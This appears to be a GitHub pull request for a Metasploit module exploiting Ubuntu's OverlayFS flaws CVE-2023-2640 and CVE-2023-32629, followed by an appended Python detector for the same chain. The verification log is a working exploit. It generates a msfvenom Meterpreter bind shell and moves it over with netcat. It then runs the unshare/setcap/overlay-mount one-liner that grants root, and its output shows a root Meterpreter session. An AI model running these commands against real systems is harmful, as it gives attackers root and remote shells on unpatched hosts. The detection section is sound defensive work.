
CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privilege Escalation

Open gardnerapp opened this issue 5 months ago • 6 comments

This module was originally suggested by #18765 and builds on this PoC from @g1vi. CVE-2023-2640 and CVE-2023-32629 allow for privilege escalation on Ubuntu systems due to a failure to call vfs_setxattr during execution of ovl_do_setxattr; this results in the failure to sanitize file capabilities during the file system union process. This article explains the technical details of the vulnerability much better than I can and also provides a convenient list of vulnerable Ubuntu and kernel versions.

This exploit was tested on Ubuntu Focal Fossa 20.04.6 with a 5.4.0-1018-aws kernel. I changed the kernel version by following this tutorial; the Google Drive doc linked in the video is probably quicker to read. Please note that I used a bind shell to connect to the system, and a bind shell as the payload for the exploit. I am well aware that bind shells are frowned upon IRL because of firewalls, IDS, etc. I only had to use one because I don't have access to a Linux system outside of the cloud.

Verification

1. Target System

ubuntu@ubuntu ~$ cat /etc/os-release && uname -a
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Linux 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

  2. Creating a bind shell:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=5555 -f elf -o bind.elf

  3. Transfer the bind shell. I used netcat.
On the remote machine: nc -lvnp 1234 > bind.elf
On the local machine: cat bind.elf | nc <REMOTE IPADDRESS> 1234

  4. Execute the bind shell:
chmod +x bind.elf && ./bind.elf

  5. Start msf and connect to the bind shell

$ msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meteroreter/bind_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:5555
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 1 opened (172.16.227.214:52193 -> 54.158.170.60:5555) at 2024-09-13 09:48:31 -0400

meterpreter > shell
Process 9129 created.
Channel 1 created.
whoami
ubuntu
exit
meterpreter > bg
[*] Backgrounding session 1...
  6. Running the exploit. I unfortunately also had to use a bind shell for this.
msf6 exploit(multi/handler) > use exploit/linux/local/game_overlay_privesc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set session 1 
session => 1
msf6 exploit(linux/local/game_overlay_privesc) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set lport 6666
lport => 6666
msf6 exploit(linux/local/game_overlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory /tmp/main/l
[*] Creating directory /tmp/main/u
[*] Creating directory /tmp/main/w
[*] Creating directory /tmp/main/m
[*] Creating directory to store payload: /tmp/main/
[*] Writing payload: /tmp/main/marv
[*] Starting new namespace, and running exploit...
[*] Running exploit: 'unshare -rm sh -c "cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system("chmod +x /tmp/main/marv && /tmp/main/marv")' ' 

false
[*] Command Stager progress - 100.00% done (747/747 bytes)
[*] Started bind TCP handler against :6666
[*] Exploit completed, but no session was created.

There is now a bind shell running on the system with root level privileges. On the remote system you can verify the listening port with ss -ano | grep 6666

  7. Connect to the root bind shell
msf6 exploit(linux/local/game_overlay_privesc) > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:6666
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 2 opened (172.16.227.214:52242 -> 54.158.170.60:6666) at 2024-09-13 09:53:31 -0400

meterpreter > shell
Process 9532 created.
Channel 1 created.
whoami
root

Here are some pictures:

Open bind port on target (screenshot: bind_shell)

Process list after payload execution: marv is meterpreter running as root (screenshot: processes)

Exploit (Screenshot 2024-09-13 at 9:54:15 AM)

Screenshot 2024-09-13 at 9:53:49 AM

gardnerapp, Sep 13 '24 14:09
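The verification log above shows the shape of the technique from the defender's side: an unprivileged user enters a user namespace (unshare -rm), sets cap_setuid on a copied binary, and mounts an overlay whose lower/upper/work directories all live under /tmp. The following detection logic, added here as an example and not part of this PR or of the Metasploit module, looks for that combination in process-execution records. The log line format, host names, timestamps and the list of user-writable directory prefixes are constructed assumptions for the example; a real deployment would feed it auditd EXECVE records or an EDR process feed in whatever format that source emits.

```python
import os
import re
import shlex
from collections import defaultdict

# Constructed sample of process-execution records (not real logs). Assumed format:
#   "<epoch> host=<name> uid=<n> cmd=<full command line>"
# The first four lines mirror the exploit chain from the verification log; the last
# two are benign look-alikes (a container runtime's overlay mount, a plain unshare).
SAMPLE_LOG = """\
1726235000 host=web1 uid=1000 cmd=unshare -rm sh -c cp /usr/bin/python3 /tmp/main/l/
1726235001 host=web1 uid=1000 cmd=setcap cap_setuid+eip /tmp/main/l/python3
1726235002 host=web1 uid=1000 cmd=mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m
1726235003 host=web1 uid=1000 cmd=/tmp/main/u/python3 -c import os;os.setuid(0)
1726235100 host=build2 uid=0 cmd=mount -t overlay overlay -o lowerdir=/var/lib/docker/overlay2/abc/lower,upperdir=/var/lib/docker/overlay2/abc/diff,workdir=/var/lib/docker/overlay2/abc/work /var/lib/docker/overlay2/abc/merged
1726235200 host=dev3 uid=1000 cmd=unshare -rm sh -c id
"""

LINE_RE = re.compile(r"^(?P<ts>\d+) host=(?P<host>\S+) uid=(?P<uid>\d+) cmd=(?P<cmd>.*)$")

# Directories an unprivileged user can normally write to (assumption for this example).
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# How close together (seconds) the indicators must be to count as one chain.
WINDOW_SECONDS = 300


def parse_line(line):
    """Parse one record into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        argv = shlex.split(m["cmd"])
    except ValueError:  # unbalanced quotes: fall back to whitespace splitting
        argv = m["cmd"].split()
    if not argv:
        return None
    return {"ts": int(m["ts"]), "host": m["host"], "uid": int(m["uid"]), "argv": argv}


def _under_user_dir(path):
    return path.startswith(USER_WRITABLE_PREFIXES)


def classify(argv):
    """Return the set of indicator names a single command line matches."""
    ind = set()
    prog = os.path.basename(argv[0])
    if prog == "unshare":
        # -r / --map-root-user maps uid 0 inside a new user namespace to the caller;
        # combined short options such as -rm still contain the letter r.
        for a in argv[1:]:
            if a == "--map-root-user" or (a.startswith("-") and not a.startswith("--") and "r" in a):
                ind.add("unshare_userns")
                break
    elif prog == "setcap" and any("cap_setuid" in a for a in argv[1:]):
        ind.add("setcap_setuid")
    elif prog == "mount" and "overlay" in argv[1:]:
        # Inspect the -o option string for overlay layers placed in user-writable paths.
        for a in argv[1:]:
            for opt in a.split(","):
                key, _, value = opt.partition("=")
                if key in ("lowerdir", "upperdir", "workdir") and _under_user_dir(value):
                    ind.add("overlay_mount_userdir")
    return ind


def find_overlay_privesc(lines, window=WINDOW_SECONDS):
    """Report hosts where a user-namespace unshare and a user-writable overlay mount
    occur within `window` seconds of each other; setcap on cap_setuid is recorded
    as an extra indicator when present. One finding per host."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append((e["ts"], e["uid"], classify(e["argv"])))
    findings = []
    for host, evs in by_host.items():
        evs.sort(key=lambda x: x[0])
        for i, (ts, uid, _) in enumerate(evs):
            seen = set()
            for ts2, _, ind in evs[i:]:
                if ts2 - ts > window:
                    break
                seen |= ind
            if {"unshare_userns", "overlay_mount_userdir"} <= seen:
                findings.append({"host": host, "uid": uid, "first_ts": ts, "indicators": sorted(seen)})
                break
    return findings


if __name__ == "__main__":
    for f in find_overlay_privesc(SAMPLE_LOG.splitlines()):
        print(f)
```

Requiring both the user-namespace unshare and the overlay mount in user-writable directories keeps container runtimes (whose overlay layers live under paths such as /var/lib/docker) and ordinary unshare usage out of the results; the setcap indicator is surfaced as supporting evidence rather than required, since the same copy-up behaviour can be reached without it.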